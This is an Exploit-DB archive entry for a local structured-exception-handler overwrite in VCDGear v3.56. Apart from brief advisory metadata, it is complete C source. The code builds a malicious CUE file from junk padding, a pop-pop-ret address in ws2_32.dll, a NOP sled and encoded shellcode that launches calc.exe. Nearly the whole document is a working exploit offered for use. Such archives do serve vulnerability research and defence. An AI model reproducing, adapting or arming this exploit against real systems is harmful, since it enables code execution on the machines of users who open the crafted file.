VCDGear v3.56 SEH overwrite

vendor:

VCDGear

by:

InTeL

7.5

CVSS

HIGH

SEH overwrite

CWE

Product Name: VCDGear

Affected Version From: VCDGear v3.56 build 050213

Affected Version To: VCDGear v3.56 build 050213

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 2000 SP4 (English)

VCDGear v3.56 SEH overwrite

The exploit allows an attacker to overwrite the Structured Exception Handler (SEH) of the VCDGear v3.56 software, potentially leading to arbitrary code execution.

Mitigation:

Apply the latest patch or update from the vendor.

Source

Exploit-DB raw data:

/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, 
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has 
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow 
different machines to process and generate output that is compatible between one another. 

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: erazerz, m03, devcode, #pen15
*/

#include <stdlib.h>
#include <stdio.h>

// Exec Calc.exe Scode
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";


int main(int argc, char *argv[])
{
	FILE *handle;

	if(argc < 2) {
		printf("0day VCDGear exploit\n");
		printf("Usage: %s <output CUE file>", argv[0]);
		return 0;
	}

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	fputs("FILE \"", handle);
	for (int i=0;i<324;i++) \
		fputs("A", handle);
	
	fputs("\xeb\x32\x90\x90", handle);
	fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 	5.0.2195.6601)
	for (i=0;i<200;i++) 
		fputs("\x90", handle);

	fputs((char *)scode, handle);
	fputs("\" BINARY\n", handle);
	fputs(" TRACK 01 MODE2/2352\n", handle);
	fputs(" INDEX 01 00:00:00\n", handle);
	
	fclose(handle);
	
	printf("[+] File successfully created");

	return 0;
}

// milw0rm.com [2007-04-13]